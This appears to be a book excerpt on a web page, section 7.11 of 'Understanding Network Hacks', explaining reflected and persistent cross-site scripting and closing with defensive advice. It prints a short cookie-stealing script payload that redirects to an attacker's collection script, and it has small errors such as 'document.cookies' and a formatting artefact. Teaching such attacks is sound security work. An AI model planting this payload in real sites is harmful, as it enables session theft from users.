Log in / Register
Home arrow Computer Science arrow Understanding Network Hacks
< Prev   CONTENTS   Next >

7.11 Cross-Site-Scripting

Cross-Site-Scripting, or XSS for short, are attacks that transfer code (mostly Javascript) through the attackable web server to the client to, for example, steal some session cookies. A XSS attack is possible if the web application allows a user to insert HTML or script code without filtering it properly and output it unescapedly. This can, for example, be the case in search boxes. An attacker can now search for the statement <script>alert(document.cookies);</script> and if the application is vulnerable get a popup dialog. By preparing the result to not be displayed in a popup but redirected to a server under their control, they could steal the cookies. <script>location.href=' save_input.cgi?cookies' + document.cookies;</script>. Let us assume the input for the search query is performed with a GET request, thus the parameters get specified over the URL directly. Then an attacker can send such a crafted URL to a victim and wait that they will click on it. This is called non-persistent XSS. Beside that, of course, there is also a persistent variant. The difference is that the attack code gets saved somewhere like in a comment function of a blog or forum.

Not only the angle brackets that enclose a HTML tag are dangerous characters, but also characters like percent, that allows the formation of url-encoded chars. An example is %3C and %3E for < and |lstinline|>|.

Over the years more and more keen techniques got developed to take advantage

of XSS vulnerabilities and today it's standard to build botnets via XSS (for example by using the BeeF framework) or to port-scan the intranet by injecting Javascript code. This can even lead to other systems being compromised like a successful scan for home routers, trying to login with default passwords and configure a backdoor with the help of port forwarding to allow anyone on the internet direct access to your internal computers.

XSS is not as harmless as it seems and not at all a security hole one can neglect as many IT staff still think.

Your web server can also be used for XSS attacks if you don't disable the TRACE method.

The author abstains from printing another code sample as it would be identically to the previous except of the list in inject_chars.

The complete deactivation of Javascript is no real choice anymore to prevent

against XSS attacks as so many websites rely on Javascript and AJAX and would be unusable without it. Therefore you should install a browser plugin that allows to selectively allow Javascript code. The most common solution for Firefox is the NoScript plugin that you can find here: Chrome has such a filter directly implemented into the browser but unfortunately no option to allow it only temporarily.

Found a mistake? Please highlight the word and press Shift + Enter  
< Prev   CONTENTS   Next >
Business & Finance
Computer Science
Language & Literature
Political science